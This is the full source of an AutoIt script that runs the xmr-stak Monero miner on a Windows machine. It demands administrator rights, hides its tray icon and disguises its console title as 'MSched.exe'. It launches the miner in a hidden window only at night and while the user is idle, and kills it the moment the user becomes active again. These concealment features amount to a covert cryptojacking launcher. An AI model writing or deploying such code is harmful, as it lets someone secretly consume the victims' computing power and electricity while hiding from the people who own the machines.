#RequireAdmin
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Change2CUI=y
#AutoIt3Wrapper_Res_requestedExecutionLevel=requireAdministrator
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
Opt("TrayIconHide", 1)
#include <ButtonConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
#include <Timers.au3>
#include <Date.au3>
#include <Constants.au3>
#include <Process.au3>
#include <Array.au3>


Dim $settings = @ScriptDir & '\mConfig.ini'
Dim $MONPROCESS = IniRead($settings, 'Settings', 'MONPROCESS', 'MSched.exe')
Dim $MINEDIRECTORY = IniRead($settings, 'Settings', 'MINEDIRECTORY', 'mapp')
Dim $MINEPROCESS = IniRead($settings, 'Settings', 'MINEPROCESS', 'xmr-stak.exe')
Dim $MINEARGS = IniRead($settings, 'Settings', 'MINEARGS', '')
Dim $waittime = IniRead($settings, 'Settings', 'waittime', 10)
Dim $starttime = IniRead($settings, 'Settings', 'starttime', "17:00")
Dim $endtime = IniRead($settings, 'Settings', 'endtime', "6:00")
IniWrite($settings, 'Settings', 'MONPROCESS', $MONPROCESS)
IniWrite($settings, 'Settings', 'MINEDIRECTORY', $MINEDIRECTORY)
IniWrite($settings, 'Settings', 'MINEPROCESS', $MINEPROCESS)
IniWrite($settings, 'Settings', 'MINEARGS', $MINEARGS)
IniWrite($settings, 'Settings', 'waittime', $waittime)
IniWrite($settings, 'Settings', 'starttime', $starttime)
IniWrite($settings, 'Settings', 'endtime', $endtime)

_WinAPI_SetConsoleTitle($MONPROCESS)
$MINEAPPPATH = @ScriptDir & "\" & $MINEDIRECTORY & "\"
$PID = 0
$in_sched = 0
$idle = 0
$running = 0
While 1 ; Monitor idle time

	$in_sched = _isNowInTimePeriod($startTime, $endTime)
	$idle = _isIdle()

	If $in_sched = 1 And $idle = 1 And $running = 0 Then ;if in schedule, idle, and not running, start program
		ConsoleWrite("Run!" & @CRLF)
		ConsoleWrite("Start Command: " & $MINEPROCESS & ' ' & $MINEARGS & @CRLF)
		$running = 1
		$PID = Run(@ComSpec & ' /c "' & $MINEPROCESS & '" ' & $MINEARGS, $MINEAPPPATH, @SW_HIDE)
		ProcessSetPriority ($PID, 0)
		ProcessSetPriority ($MINEPROCESS, 0)
	ElseIf ($in_sched = 0 Or $idle = 0) And $running = 1 Then ;if not in schedule or not idle, and running, kill program
		ConsoleWrite("Kill!" & @CRLF)
		$running = 0
		ProcessClose($MINEPROCESS)
	Else
		If ProcessExists($MINEPROCESS) Then
			$running = 1
		Else
			$running = 0
		EndIf
	EndIf
	ConsoleWrite("In Schedule:" & $in_sched & " Idle:" & $idle & " $running:" & $running & @CRLF)
	Sleep($waittime * 1000)
WEnd

Func _isNowInTimePeriod($startTime, $endTime)
	$nowTime = _DateTimeFormat( _NowCalc(),4)
    If $startTime < $endTime Then
		If $nowTime >= $startTime And $nowTime <= $endTime Then
			Return 1
		Else
			Return 0
		EndIf
	Else ;Over midnight
		If $nowTime >= $startTime Or $nowTime <= $endTime Then
			Return 1
		Else
			Return 0
		EndIf
	EndIf
EndFunc

Func _isIdle()
    ; If idle for more than 10 secs
    If _Timer_GetIdleTime() > ($waittime * 1000) Then
		Return 1
	Else
		Return 0
	EndIf
EndFunc

; #FUNCTION# ====================================================================================================================
; Name ..........: _WinAPI_SetConsoleTitle
; Description ...: Change the AutoIt process's attached console title.
; Syntax ........: _WinAPI_SetConsoleTitle($sTitle[, $hDLL = "Kernel32.dll"])
; Parameters ....: $sTitle            - A string value.
;                 $hDLL             - [optional] A handle value. Default is "Kernel32.dll".
; Return values .: True if the title was able to be changed, False if it was not able to be changed.
; Author ........: Ken "Kealper" Piper
; Modified ......:
; Remarks .......:
; Related .......:
; Link ..........:
; Example .......: No
; ===============================================================================================================================
Func _WinAPI_SetConsoleTitle($sTitle, $hDLL = "Kernel32.dll")
    Local $iRet = DllCall($hDLL, "bool", "SetConsoleTitle", "str", $sTitle)
    If $iRet[0] < 1 Then Return False
    Return True
EndFunc
